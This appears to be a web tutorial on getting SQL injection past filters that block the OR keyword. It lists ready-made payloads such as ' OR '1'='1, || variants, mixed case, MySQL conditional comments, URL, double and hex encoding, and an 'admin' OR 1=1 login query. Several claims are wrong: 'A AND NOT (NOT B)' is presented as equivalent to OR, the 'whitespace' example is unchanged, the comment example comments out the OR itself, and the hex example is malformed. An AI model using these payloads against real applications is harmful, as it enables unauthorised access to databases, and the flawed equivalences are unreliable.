OR SQL Injection Bypass

TL;DR

Many web applications try to prevent OR (OR) SQL injection attacks by filtering the OR keyword. This guide shows common bypass techniques, including using alternative syntax and encoding.

Bypassing OR SQLi Filters: A Step-by-Step Guide

1. Understand the Problem

   Web applications often block OR to prevent attackers from combining multiple conditions in a way that always evaluates to true. For example, if an application filters OR, a simple attack like ' OR '1'='1 will fail.

2. Alternative Syntax

   Try different ways to write the OR condition:

   • Using ||: Some databases support || as an alternative logical OR operator. Try ' || '1'='1
   • Using AND NOT: You can often achieve the same result using AND NOT conditions. For example, instead of A OR B try A AND NOT (NOT B). This might look like ' AND NOT ('1'!='1
   • Using UNION SELECT: While not a direct bypass of the OR filter, if you can identify columns and data types, a UNION attack may be possible.
3. Case Sensitivity Bypass

   Some filters are case-sensitive. Try variations in capitalization:

   • ' OR '1'='1
   • ' oR '1'='1
   • ' Or '1'='1
4. Whitespace and Comments

   Adding whitespace or comments can sometimes bypass filters:

   • Whitespace: ' OR '1'='1
   • Comments (MySQL): ' /*!OR*/ '1'='1. The /*!... */ syntax is only executed by MySQL if the version supports it, making it a conditional comment.
   • Comments (– for SQL Server/PostgreSQL): ' -- OR '1'='1. This comments out the rest of the query after the --.
5. Encoding (URL Encoding)

   If the input is URL encoded, try encoding parts of the OR keyword:

   • Encode the entire keyword: %4f%52 (hexadecimal for OR).
   • Encode individual characters: ' %4f%52 '1'='1.
6. Double Encoding

   Sometimes, applications decode the input multiple times. Try double encoding:

   • Encode OR to %4f%52 and then encode that again to %254f%2552
7. Using Hex Encoding

   Some databases allow hex encoding of strings:

   • In MySQL, you might try: ' AND 0x4f52 '1'='1 (hexadecimal for OR).
8. Character Substitution

   Try substituting characters that are similar in appearance:

   • Using Unicode equivalents. For example, try different Unicode representations of the ‘O’ and ‘R’ characters.
9. Exploit Example (MySQL)

   SELECT * FROM users WHERE username = 'admin' OR 1=1;

   If the filter blocks OR, try:

   SELECT * FROM users WHERE username = 'admin' AND NOT (NOT 1=1);

10. Important Considerations
    • Database Type: The best bypass technique depends on the specific database system being used.
    • Filter Complexity: Some filters are more sophisticated and may require more creative bypasses.
    • Error Messages: Pay attention to error messages, as they can provide clues about how the filter is working.